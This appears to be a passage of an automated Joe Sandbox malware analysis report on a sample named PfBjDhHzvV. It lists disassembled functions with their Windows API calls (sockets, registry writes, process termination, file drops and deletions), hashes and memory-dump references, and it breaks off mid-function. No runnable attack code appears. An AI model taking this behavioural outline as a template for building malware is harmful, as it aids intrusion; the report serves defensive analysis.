                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 6873c960e5deeb2e47474bfd026866cfb3e5055baaa95da991f6b7d921a12c56
                                                                                                                                                                                                                                    • Instruction ID: bfc4f1234716864fc6d6ee81138e564ec9e66d0f8821602d3159a799e760fdac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6873c960e5deeb2e47474bfd026866cfb3e5055baaa95da991f6b7d921a12c56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20519C74D152699FEB28DB18CC95BE9B7B5AB45304F6081D9E39DA62C0CBB06EC4CF40
                                                                                                                                                                                                                                    Function 01292A35 Relevance: 10.1, APIs: 8, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01292A4E
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DE0), ref: 01292A7C
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DE4), ref: 01292AA2
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DE8), ref: 01292AB1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01292B0C
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DEC), ref: 01292B40
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DF0), ref: 01292B66
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DF4), ref: 01292B83
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3054446656-0
                                                                                                                                                                                                                                    • Opcode ID: 278a818721baf87e0095b17d27ec3516e8d65f23bd5cb79ba5ff38b9956354aa
                                                                                                                                                                                                                                    • Instruction ID: 09fc9c241fde4b245687694fb28575f04345e8a61d3a61c94f2e012c5c3f21e8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 278a818721baf87e0095b17d27ec3516e8d65f23bd5cb79ba5ff38b9956354aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5431A576B21146FBDF14EF68E889BBD3B76EF94700F14C128E505972C4C678DA548BA0
                                                                                                                                                                                                                                    Function 01289ACF Relevance: 9.0, APIs: 6, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(012826E0,40000000,00000000,00000000,00000003,00000000,00000000,?,01289E89), ref: 01289AF1
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 01289B0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 01289B20
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 01289B2A
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 01289B42
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 01289B4C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2603052737-0
                                                                                                                                                                                                                                    • Opcode ID: e9ad6567e78db4a78d61dedc91907e8c7b8834db17222e61b25cbffddd3ea6ff
                                                                                                                                                                                                                                    • Instruction ID: 932a0b2219404bff7fb2d06c2f0154c70cec79ee132b0be5b209f5f006c059f8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9ad6567e78db4a78d61dedc91907e8c7b8834db17222e61b25cbffddd3ea6ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0015B74A40208FBEB20DFE0EC4DF9D7B78AB88700F108184F711A62D0D7B06684DB50
                                                                                                                                                                                                                                    Function 01284F36 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96registrystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01284F6B
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01284FFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01285021
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0128504B
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 0128505A
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0128507A
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0128508C
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01285100
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285153
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0128518F
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0128543A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 3359840872-3143526458
                                                                                                                                                                                                                                    • Opcode ID: a070c2d49128730578442266e62b68f6328633ab027a3882ee4beeb3c410040c
                                                                                                                                                                                                                                    • Instruction ID: 72825f3eb68f437951b350e8f5d18aa87c520b9dccee210832f950edbc2e39ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a070c2d49128730578442266e62b68f6328633ab027a3882ee4beeb3c410040c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB4191B5826128DBCB30EF50DC46FE9B775BB58305F0882CAE51966281DAB25B88CF50
                                                                                                                                                                                                                                    Function 0128811C Relevance: 7.6, APIs: 5, Instructions: 103networkmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 01287FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 012880DA
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,-00000C00), ref: 012881A1
                                                                                                                                                                                                                                    • recv.WS2_32(?,00000008,00000400,00000000), ref: 012881F0
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01288247
                                                                                                                                                                                                                                    • send.WS2_32(?,00000000,?,00000000), ref: 0128826D
                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 01288283
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$AllocFreeclosesocketrecvselectsend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 424924859-0
                                                                                                                                                                                                                                    • Opcode ID: 67fde1d75f6742715a10b706d9f8f539b7a1615e35624793820447a19246d7b0
                                                                                                                                                                                                                                    • Instruction ID: 217ec062f7c35bddce376c597c85877681d9acb404e5c26450f48def935a5ab1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67fde1d75f6742715a10b706d9f8f539b7a1615e35624793820447a19246d7b0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC419F70911209EFDF24EB98CC48BE9B7B9BB94305F44C198E648A72C4DB74AA84CF50
                                                                                                                                                                                                                                    Function 012892F3 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 01289322
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128932F
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283C90), ref: 0128934E
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01282288), ref: 01289362
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0128268C), ref: 01289375
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$DirectorySystemlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3692445580-0
                                                                                                                                                                                                                                    • Opcode ID: a7fa01e4fef9255b7d3c6faebcf2b6c429f5780b752d711401934f6b02f0a369
                                                                                                                                                                                                                                    • Instruction ID: 80925d157b5b94a42a545963ed9fdfe0c74766bcdcb813a2ef9f6d121bbcc397
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7fa01e4fef9255b7d3c6faebcf2b6c429f5780b752d711401934f6b02f0a369
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E2162B9A10214AFDF20DB68EC4DBA97778BB88705F008198F709A31C4CB706A95CF64
                                                                                                                                                                                                                                    Function 0128940A Relevance: 7.6, APIs: 5, Instructions: 68sleepstringthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 0128945E
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000080), ref: 0128947B
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01289495
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0002D000), ref: 012894BF
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 012894EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$ExitThreadUserlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3026710222-0
                                                                                                                                                                                                                                    • Opcode ID: f57d0695c7e600b21c3c3823027180130fcbc80bd780dcf4c19346f8ebccc457
                                                                                                                                                                                                                                    • Instruction ID: 948ad9497ba417a8c54a11f0e90f555fb104da094c6e8164e47ea608a82d413d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f57d0695c7e600b21c3c3823027180130fcbc80bd780dcf4c19346f8ebccc457
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8219570A54308DBEF10DFD8EC09BAEB7B4FB89759F108119E515A63C4C7B96450CBA0
                                                                                                                                                                                                                                    Function 01290C4B Relevance: 7.6, APIs: 5, Instructions: 60filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01290C6E
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 01290CA0
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00F423D8,0001E200,?,00000000), ref: 01290CC6
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01290CD0
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 01290CDA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AttributesCloseCreateHandleWritelstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 96072700-0
                                                                                                                                                                                                                                    • Opcode ID: a4a7dc642370d7071dbea88f2ba4310cecfbf74c713a9dcdf868063a0e44ce81
                                                                                                                                                                                                                                    • Instruction ID: 71f7e6514b71a1bb7791aa4c347c40cbebfa6455abab6a1b4c1ebe9d5dcd1717
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4a7dc642370d7071dbea88f2ba4310cecfbf74c713a9dcdf868063a0e44ce81
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE116375620348FFDB20CFA8D889B9D7B79AB44711F508654FA05D62C1D670AA808B58
                                                                                                                                                                                                                                    Function 0128A1F2 Relevance: 7.5, APIs: 5, Instructions: 38sleepfilestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0128A220
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0128A236
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0128A24A
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002800), ref: 0128A255
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0128A25F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1172011736-0
                                                                                                                                                                                                                                    • Opcode ID: 5bf5046ce5efe61ed63e8451a91ddb72e3f3427ce4d15d05d4735c6ac2892537
                                                                                                                                                                                                                                    • Instruction ID: 9ff8697f2ae112ffdc6517dd43238817c446780e1c0029e03902fc0281c95179
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bf5046ce5efe61ed63e8451a91ddb72e3f3427ce4d15d05d4735c6ac2892537
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F02835910214ABEB309BB8E84CBA6B778BF84301F0082A6E612C21D5DF72A5148B51
                                                                                                                                                                                                                                    Function 01284631 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74stringprocessCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 012846EE
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 012846FB
                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0128476E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateProcesslstrcpylstrlen
                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                    • API String ID: 2742767947-2746444292
                                                                                                                                                                                                                                    • Opcode ID: 33398fecb908110d93acd8f0a8ddaed2c1b754431e5ecbe5a6dce116e53bdb02
                                                                                                                                                                                                                                    • Instruction ID: 9b454e7b71fb4a95cd3cfeb0c70500a248620258c2a3f6450fca3176268e74e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33398fecb908110d93acd8f0a8ddaed2c1b754431e5ecbe5a6dce116e53bdb02
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4314FB190426CDFDB64DF54CC587DABBB4AB55304F0081D9D28DAB280DBB51AC48F80
                                                                                                                                                                                                                                    Function 01285A6A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285AF0
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01285B2D
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 01285BFB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseQueryValuewsprintf
                                                                                                                                                                                                                                    • String ID: %c%d_%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 2691868063-3771101883
                                                                                                                                                                                                                                    • Opcode ID: f3d55af2b26bf868c09e5f13b9d828dccfeac75864b396d9b0b9f9eb0f180072
                                                                                                                                                                                                                                    • Instruction ID: b9bb7cad48fde28544c9f8c263c308ff2af312a5007384b37018761eafca486c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3d55af2b26bf868c09e5f13b9d828dccfeac75864b396d9b0b9f9eb0f180072
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40112B74911228EBDB24DF94EC88BE9B7B4BB58304F1481CDD20A66285D7749FC4CF54
                                                                                                                                                                                                                                    Function 01285AB4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285AF0
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01285B2D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: QueryValuewsprintf
                                                                                                                                                                                                                                    • String ID: %c%d_%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 2072284396-3771101883
                                                                                                                                                                                                                                    • Opcode ID: 5d26f03dc4fae02c76bc66df3df5296c784dde92963fe821581668481f039541
                                                                                                                                                                                                                                    • Instruction ID: 3f0c8b7be57cbf3435f6d4b51a4d2876a1d009bc4f4704aa90081f40b0eb4699
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d26f03dc4fae02c76bc66df3df5296c784dde92963fe821581668481f039541
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 310121B5951128EBDB20DF95EC8CBE9B3B8BB58304F1081CCE209A6284D774ABC4CF54
                                                                                                                                                                                                                                    Function 012882B6 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 01288317
